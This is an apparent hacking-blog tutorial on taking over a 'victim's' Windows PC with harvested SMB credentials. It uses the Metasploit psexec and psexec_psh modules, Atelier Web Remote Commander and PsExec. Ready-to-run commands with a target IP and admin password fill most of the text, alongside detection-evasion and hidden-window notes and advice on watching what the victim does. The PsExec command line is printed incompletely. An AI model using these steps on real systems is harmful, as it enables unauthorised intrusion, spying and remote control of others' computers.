To
understand what is SMB protocol, click here
To know how
collect username and passwords to your remote host via SMB protocol, click here
In this
article, we will learn how to exploit your remote PC once you have collected
username and password to your victim's PC. There are four ways to do so and
they all are listed below:
Microsoft Windows Authenticated User
Code Execution
This module uses a valid
administrator username and password (or password hash) to execute an arbitrary
payload. This module is similar to the "psexec" utility provided by
SysInternals. This module is now able to clean up after itself. The service
created by this tool uses a randomly chosen name and description.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.0.104
msf exploit(psexec) > set rport 445
msf exploit(psexec) > set smbuser administrator
msf exploit(psexec) > set smbpass Ignite@123
msf exploit(psexec) > exploit
Here,
rhost --> IP of victim PC
rport --> port through which we are
attacking
smbuser --> username
smbpass --> password
Once the
commands run you will gain a meterpreter session of your victim's PC and so you
can access it as you want.
Microsoft Windows Authenticated
Powershell Command Execution
This module uses a valid
administrator username and password to execute a powershell payload using a
similar technique to the "psexec" utility provided by SysInternals.
The payload is encoded in base64 and executed from the commandline using the –encoded
command flag. Using this method, the payload is never written to disk, and
given that each payload is unique, is less prone to signature based detection.
A persist option is provided to execute the payload in a while loop in order to
maintain a form of persistence. In the event of a sandbox observing PSH
execution, a delay and other obfuscation may be added to avoid detection. In
order to avoid interactive process notifications for the current user, the psh
payload has been reduced in size and wrapped in a powershell invocation which
hides the window entirely.
msf > use exploit/windows/smb/psexec_psh
msf exploit(psexec_psh) > set rhost 192.168.0.104
msf exploit(psexec_psh)
> set rport 445
msf exploit(psexec_psh)
> set smbuser administrator
msf exploit(psexec_psh)
> set smbpass Ignite@123
msf exploit(psexec_psh)
> exploit
Once again
as the commands run you will gain a meterpreter sesion of victim's PC. And
therefore, you can do as you desire.
Atelier Web Remote Commander
This is graphical
software that let us gain control of victim's PC that too quite easily.
Once you have open
the software give the IP address of
your victim's PC in remote host box along with the username and password in
their respective boxes. And then click on connect;
the whole victim's PC's screen will appear on your Desktop and you will have
pretty good view of what your victim is doing.
Psexec.exe
Psexec.exe
is software that helps us to access other computers in a network. This software
directly takes us to the shell of the remote PC with advantage of doing nothing
manually. Download this software from --> http://download.sysinternals.com/files/PSTools.zip.
Unzip the
file once you have downloaded it. Go to you command prompt and type:
\\192.168.0.106 -u administrator -p Ignite@123 cmd
Here,
192.168.0.106
--> is the IP of remoste host
-u --> denotes
username
-p --> denotes
password
cmd --> to enter
victim's command prompt
0 comments:
Post a Comment